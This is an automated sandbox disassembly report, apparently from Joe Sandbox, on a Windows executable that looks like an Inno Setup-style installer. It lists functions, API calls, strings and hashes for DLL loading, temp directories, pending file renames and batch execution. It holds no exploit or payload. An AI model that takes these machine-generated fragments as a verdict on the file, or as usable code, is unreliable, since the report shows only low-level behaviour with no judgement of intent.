                                                                            Function 004779B4 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 95libraryloaderCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1855 4779b4-477a0a call 42c36c call 4035c0 call 477630 call 450f5c 1864 477a16-477a25 call 450f5c 1855->1864 1865 477a0c-477a11 call 451cc8 1855->1865 1869 477a27-477a2d 1864->1869 1870 477a3f-477a45 1864->1870 1865->1864 1871 477a4f-477a57 call 403494 1869->1871 1872 477a2f-477a35 1869->1872 1873 477a47-477a4d 1870->1873 1874 477a5c-477a84 call 42e1f0 * 2 1870->1874 1871->1874 1872->1870 1876 477a37-477a3d 1872->1876 1873->1871 1873->1874 1881 477a86-477aa6 call 40785c call 451cc8 1874->1881 1882 477aab-477ac5 GetProcAddress 1874->1882 1876->1870 1876->1871 1881->1882 1884 477ac7-477acc call 451cc8 1882->1884 1885 477ad1-477aee call 403400 * 2 1882->1885 1884->1885
                                                                            APIs
                                                                            • GetProcAddress.KERNEL32(6E570000,SHGetFolderPathA), ref: 00477AB6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc
                                                                            • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
                                                                            • API String ID: 190572456-1343262939
                                                                            • Opcode ID: 326d038cb5ed66d6965ef9f79b3615df5c39ec0eed82ce05998c1027af74040e
                                                                            • Instruction ID: 49185784d2d2767166d0e9f92b0e194c902f92e05003c5a198be5f154938151e
                                                                            • Opcode Fuzzy Hash: 326d038cb5ed66d6965ef9f79b3615df5c39ec0eed82ce05998c1027af74040e
                                                                            • Instruction Fuzzy Hash: 2D310030A042099FDB11EB95D8829DEB7B5EB44308FA08577E804E7351D778AF45CBAC
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0042ED94 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 90windowregistryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1893 42ed94-42ed9e 1894 42eda0-42eda3 call 402d30 1893->1894 1895 42eda8-42ede5 call 402b30 GetActiveWindow GetFocus call 41ee14 1893->1895 1894->1895 1901 42edf7-42edff 1895->1901 1902 42ede7-42edf1 RegisterClassA 1895->1902 1903 42ee86-42eea2 SetFocus call 403400 1901->1903 1904 42ee05-42ee36 CreateWindowExA 1901->1904 1902->1901 1904->1903 1906 42ee38-42ee7c call 4241ec call 403738 CreateWindowExA 1904->1906 1906->1903 1912 42ee7e-42ee81 ShowWindow 1906->1912 1912->1903
                                                                            APIs
                                                                            • GetActiveWindow.USER32 ref: 0042EDC3
                                                                            • GetFocus.USER32 ref: 0042EDCB
                                                                            • RegisterClassA.USER32(004937AC), ref: 0042EDEC
                                                                            • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042EEC0,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042EE2A
                                                                            • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042EE70
                                                                            • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042EE81
                                                                            • SetFocus.USER32(00000000,00000000,0042EEA3,?,?,?,00000001,00000000,?,00456712,00000000,00494628), ref: 0042EE88
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                            • String ID: (FI$TWindowDisabler-Window
                                                                            • API String ID: 3167913817-373594729
                                                                            • Opcode ID: a3ca60a75e732bb51453dddc2c490802b9d7a662ac09df4b556055ac6f1e94aa
                                                                            • Instruction ID: da0a8043275c7bf3a93fe4eefa1d540893f351b9f71510032f8cfd414f1a65c9
                                                                            • Opcode Fuzzy Hash: a3ca60a75e732bb51453dddc2c490802b9d7a662ac09df4b556055ac6f1e94aa
                                                                            • Instruction Fuzzy Hash: 6721B2B1740711BAE220EF62DC02F1B76A8EB45B04F61413BF600AB2D1D7BC6D11C6AD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00451B74 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46libraryloaderCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1913 451b74-451bc5 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 1914 451bc7-451bce 1913->1914 1915 451bd0-451bd2 1913->1915 1914->1915 1916 451bd4 1914->1916 1917 451bd6-451c0c call 42e1f0 call 42e670 call 403400 1915->1917 1916->1917
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00451C0D,?,?,?,?,00000000,?,0049297B), ref: 00451B94
                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00451B9A
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00451C0D,?,?,?,?,00000000,?,0049297B), ref: 00451BAE
                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00451BB4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                            • API String ID: 1646373207-2130885113
                                                                            • Opcode ID: f383fb48213f6c2b98df67bb585b7a3e2d1d6244cf436abb077e6f35d80479e6
                                                                            • Instruction ID: 997ed90857de5ca6b6faab55f770a1a30dabd985267bea0a56e7b9690acb7eff
                                                                            • Opcode Fuzzy Hash: f383fb48213f6c2b98df67bb585b7a3e2d1d6244cf436abb077e6f35d80479e6
                                                                            • Instruction Fuzzy Hash: 4201D474284304AEDB02EB72EC06F5B3A58F751B1AF60487BF800562A3D6FD5D09CA2D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00477688 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 108COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004777FB,?,?,00000000,00494628,00000000,00000000,?,00492351,00000000,004924FA,?,00000000), ref: 0047771B
                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,004777FB,?,?,00000000,00494628,00000000,00000000,?,00492351,00000000,004924FA,?,00000000), ref: 00477724
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectoryErrorLast
                                                                            • String ID: Created temporary directory: $REGDLL_EXE$\_RegDLL.tmp$\_setup64.tmp$_isetup
                                                                            • API String ID: 1375471231-1421604804
                                                                            • Opcode ID: 9af9e5047942150dd1bdaf748b612ec8dc7c41cda999b56e55422ae8274150d3
                                                                            • Instruction ID: 4b0667b2ca952db17e5eb31d7eb45e66b75ce74adbb243fdaac5edde39bfd4c6
                                                                            • Opcode Fuzzy Hash: 9af9e5047942150dd1bdaf748b612ec8dc7c41cda999b56e55422ae8274150d3
                                                                            • Instruction Fuzzy Hash: B3415634A002099BCB01FF95C891ADEB7B5FB44304F50857BE81477396D738AE05CBA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00430174 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 23registryclipboardthreadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • RegisterClipboardFormatA.USER32(commdlg_help), ref: 0043017C
                                                                            • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0043018B
                                                                            • GetCurrentThreadId.KERNEL32 ref: 004301A5
                                                                            • GlobalAddAtomA.KERNEL32(00000000), ref: 004301C6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                            • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                            • API String ID: 4130936913-2943970505
                                                                            • Opcode ID: e1a288e5974f646cac8171a9bb8c2e0076bf1e8d900104ca3b2b9541d9e9a9a5
                                                                            • Instruction ID: 40284a23f2128dd4c732f76bf629692f59332b695a7ba269acd0c8d21ef7b0e1
                                                                            • Opcode Fuzzy Hash: e1a288e5974f646cac8171a9bb8c2e0076bf1e8d900104ca3b2b9541d9e9a9a5
                                                                            • Instruction Fuzzy Hash: ACF082B04483408AD700EB75C802B197BE4EB99318F00467FB858A63E1D77E8501CB5F
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00453780 Relevance: 10.7, APIs: 2, Strings: 5, Instructions: 155COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,0045399C,0045399C,00000031,0045399C,00000000), ref: 00453928
                                                                            • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,0045399C,0045399C,00000031,0045399C), ref: 00453935
                                                                              • Part of subcall function 004536EC: WaitForInputIdle.USER32(00000001,00000032), ref: 00453718
                                                                              • Part of subcall function 004536EC: MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 0045373A
                                                                              • Part of subcall function 004536EC: GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 00453749
                                                                              • Part of subcall function 004536EC: CloseHandle.KERNEL32(00000001,00453776,0045376F,?,00000031,00000080,00000000,?,?,00453AC7,00000080,0000003C,00000000,00453ADD), ref: 00453769
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                            • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                                            • API String ID: 854858120-615399546
                                                                            • Opcode ID: 3ba6da27587f0247c6075d637dc04b84a3427199ed6966589dcae68aca958c76
                                                                            • Instruction ID: 23b7935fd39ab9199875fd3ca17ea8a190fbf679708bf4b94726f8b76bbbb425
                                                                            • Opcode Fuzzy Hash: 3ba6da27587f0247c6075d637dc04b84a3427199ed6966589dcae68aca958c76
                                                                            • Instruction Fuzzy Hash: 385148B470034DABDB11EFA5CC41BDEBBB9AF44746F50443BB804A7282D7799B098B58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004235FC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 96windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadIconA.USER32(00400000,MAINICON), ref: 0042368C
                                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418F56,00000000,?,?,?,00000001), ref: 004236B9
                                                                            • OemToCharA.USER32(?,?), ref: 004236CC
                                                                            • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418F56,00000000,?,?,?,00000001), ref: 0042370C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Char$FileIconLoadLowerModuleName
                                                                            • String ID: 2$MAINICON
                                                                            • API String ID: 3935243913-3181700818
                                                                            • Opcode ID: 0aa366c20d2d5f249e9f5701ecd4d5d8333df010bd072e77a87ccb3058afe0f7
                                                                            • Instruction ID: 369b424dc89666f2ebc4032af242e6aa1f8f3c6487aa9724dd5eac47ff86fd2b
                                                                            • Opcode Fuzzy Hash: 0aa366c20d2d5f249e9f5701ecd4d5d8333df010bd072e77a87ccb3058afe0f7
                                                                            • Instruction Fuzzy Hash: EC31C4B0A042449ADF10EF29C8C57C67BE8AF14308F4440BAE844DB383D7BED989CB65
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00418EA8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentProcessId.KERNEL32(00000000), ref: 00418EAD
                                                                            • GlobalAddAtomA.KERNEL32(00000000), ref: 00418ECE
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00418EE9
                                                                            • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F0A
                                                                              • Part of subcall function 00423038: 73A0A570.USER32(00000000,?,?,00000000,?,00418F43,00000000,?,?,?,00000001), ref: 0042308E
                                                                              • Part of subcall function 00423038: EnumFontsA.GDI32(00000000,00000000,00422FD8,004105C0,00000000,?,?,00000000,?,00418F43,00000000,?,?,?,00000001), ref: 004230A1
                                                                              • Part of subcall function 00423038: 73A14620.GDI32(00000000,0000005A,00000000,00000000,00422FD8,004105C0,00000000,?,?,00000000,?,00418F43,00000000), ref: 004230A9
                                                                              • Part of subcall function 00423038: 73A0A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00422FD8,004105C0,00000000,?,?,00000000,?,00418F43,00000000), ref: 004230B4
                                                                              • Part of subcall function 004235FC: LoadIconA.USER32(00400000,MAINICON), ref: 0042368C
                                                                              • Part of subcall function 004235FC: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418F56,00000000,?,?,?,00000001), ref: 004236B9
                                                                              • Part of subcall function 004235FC: OemToCharA.USER32(?,?), ref: 004236CC
                                                                              • Part of subcall function 004235FC: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418F56,00000000,?,?,?,00000001), ref: 0042370C
                                                                              • Part of subcall function 0041F088: GetVersion.KERNEL32(?,00418F60,00000000,?,?,?,00000001), ref: 0041F096
                                                                              • Part of subcall function 0041F088: SetErrorMode.KERNEL32(00008000,?,00418F60,00000000,?,?,?,00000001), ref: 0041F0B2
                                                                              • Part of subcall function 0041F088: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418F60,00000000,?,?,?,00000001), ref: 0041F0BE
                                                                              • Part of subcall function 0041F088: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418F60,00000000,?,?,?,00000001), ref: 0041F0CC
                                                                              • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F0FC
                                                                              • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F125
                                                                              • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F13A
                                                                              • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F14F
                                                                              • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F164
                                                                              • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F179
                                                                              • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F18E
                                                                              • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F1A3
                                                                              • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F1B8
                                                                              • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F1CD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$A14620A480A570EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
                                                                            • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                            • API String ID: 3476490787-2767913252
                                                                            • Opcode ID: b3f6e413c8898143d790cb1a0652853cd6d9d94ba28684c67143a23da7476cd1
                                                                            • Instruction ID: 92c0f9287c22c5e7546306507112dd287fc16e7faa7ca2eb1c3947f0aa7fa29a
                                                                            • Opcode Fuzzy Hash: b3f6e413c8898143d790cb1a0652853cd6d9d94ba28684c67143a23da7476cd1
                                                                            • Instruction Fuzzy Hash: 511160B06142409AC700FF6AE84274A77E0EBA930DF40853FF548DB2A1DB3D9946CB5E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004135AC Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetWindowLongA.USER32(?,000000FC,?), ref: 004135D4
                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 004135DF
                                                                            • GetWindowLongA.USER32(?,000000F4), ref: 004135F1
                                                                            • SetWindowLongA.USER32(?,000000F4,?), ref: 00413604
                                                                            • SetPropA.USER32(?,00000000,00000000), ref: 0041361B
                                                                            • SetPropA.USER32(?,00000000,00000000), ref: 00413632
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: LongWindow$Prop
                                                                            • String ID:
                                                                            • API String ID: 3887896539-0
                                                                            • Opcode ID: ac9e2524259f19aa4ae75357c34db2059614287f421b72dcfc2803ed6b471743
                                                                            • Instruction ID: 8501a907ea9830ee22782c43eb3b10d12b3a7942569ffdc076e3785703ae90ad
                                                                            • Opcode Fuzzy Hash: ac9e2524259f19aa4ae75357c34db2059614287f421b72dcfc2803ed6b471743
                                                                            • Instruction Fuzzy Hash: 0911FC75200204BFCB00DF99DC84E9A3BE8AB09365F104266B928DB2A1D738EE908B54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0046DB54 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 263fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,0046DD25,?,00000000,?,00000001,00000000,0046DEF3,?,00000000,?,00000000,?,0046E0AE), ref: 0046DD01
                                                                            • FindClose.KERNEL32(000000FF,0046DD2C,0046DD25,?,00000000,?,00000001,00000000,0046DEF3,?,00000000,?,00000000,?,0046E0AE,?), ref: 0046DD1F
                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,0046DE47,?,00000000,?,00000001,00000000,0046DEF3,?,00000000,?,00000000,?,0046E0AE), ref: 0046DE23
                                                                            • FindClose.KERNEL32(000000FF,0046DE4E,0046DE47,?,00000000,?,00000001,00000000,0046DEF3,?,00000000,?,00000000,?,0046E0AE,?), ref: 0046DE41
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Find$CloseFileNext
                                                                            • String ID: UF
                                                                            • API String ID: 2066263336-3088804789
                                                                            • Opcode ID: f2465bc261f959717d47697a8d45f32f7a1ade22301a2265577b1f26eed1a576
                                                                            • Instruction ID: 7787c03929e80ffec34d714e2f8fb83db301553702bc5b4ecfdbbcdcf4a79d9f
                                                                            • Opcode Fuzzy Hash: f2465bc261f959717d47697a8d45f32f7a1ade22301a2265577b1f26eed1a576
                                                                            • Instruction Fuzzy Hash: C2B11B74E0424D9FCF11DFA5C881ADEBBB9BF4C304F5081AAE808A7251D7399A46CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00453E40 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 142registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00453FD7,?,00000000,00454017), ref: 00453F1D
                                                                            Strings
                                                                            • PendingFileRenameOperations, xrefs: 00453EBC
                                                                            • WININIT.INI, xrefs: 00453F4C
                                                                            • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00453EA0
                                                                            • PendingFileRenameOperations2, xrefs: 00453EEC
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpen
                                                                            • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                            • API String ID: 47109696-2199428270
                                                                            • Opcode ID: 6a4b91970a201f8e62ec4ce35f438840b63ea26c0fa97f58e3d9b69a11e17943
                                                                            • Instruction ID: 2ff6c49e49fdc546bb7a45c023e4930071e44da3c5b1decde5d7ffad05d461ef
                                                                            • Opcode Fuzzy Hash: 6a4b91970a201f8e62ec4ce35f438840b63ea26c0fa97f58e3d9b69a11e17943
                                                                            • Instruction Fuzzy Hash: BF51C831E041089FDB10DF61DC52ADEF7B9EB84705F60817BF804A72C2DB78AA45CA18
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00463630 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 004636CD
                                                                            • ExtractIconA.SHELL32(00400000,00000000,?), ref: 004636F3
                                                                              • Part of subcall function 00463570: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00463608
                                                                              • Part of subcall function 00463570: DestroyCursor.USER32(00000000), ref: 0046361E
                                                                            • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 0046374F
                                                                            • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00463775
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Icon$ExtractFileInfo$CursorDestroyDraw
                                                                            • String ID: c:\directory
                                                                            • API String ID: 2926980410-3984940477
                                                                            • Opcode ID: 6691f682c62b404754f8d66222e799753b1ee5a40e648aa7774ae51fe24a4016
                                                                            • Instruction ID: bae189fc96b8bd3553fc63f17e14eeae1d3b5729288d1f1a5c0b2b9fb69e759c
                                                                            • Opcode Fuzzy Hash: 6691f682c62b404754f8d66222e799753b1ee5a40e648aa7774ae51fe24a4016
                                                                            • Instruction Fuzzy Hash: CB4171B4600244AFD711DF55DC8AFDEBBE8EB48705F1081B6F904D7391E678AE408A59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00453544 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 102libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 004535F2
